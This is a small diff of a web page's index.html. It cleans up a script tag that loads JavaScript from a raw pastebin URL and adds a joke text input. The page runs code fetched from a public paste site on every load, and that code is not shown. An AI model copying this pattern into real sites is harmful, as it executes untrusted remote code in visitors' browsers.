--- a/index.html
+++ b/index.html
@@ -14,6 +14,7 @@
 <iframe id="i" marginwidth="0" marginheight="0" name="ventana_iframe" scrolling="no" border="0" frameborder="0" width="800" height="15"></iframe>
 <iframe id="j" marginwidth="0" marginheight="0" name="ventana_iframe" scrolling="no" border="0" frameborder="0" width="800" height="15"></iframe>
 
-<script src="https://pastebin.com/raw/9d9jmXrd" marginwidth="0" marginheight="0" name="ventana_iframe" scrolling="no" border="0" frameborder="0" width="800" height="15"></script>
+  <input type='text' placeholder='caca'>popo
+<script src="https://pastebin.com/raw/9d9jmXrd"></script>
 </body>
 </html>
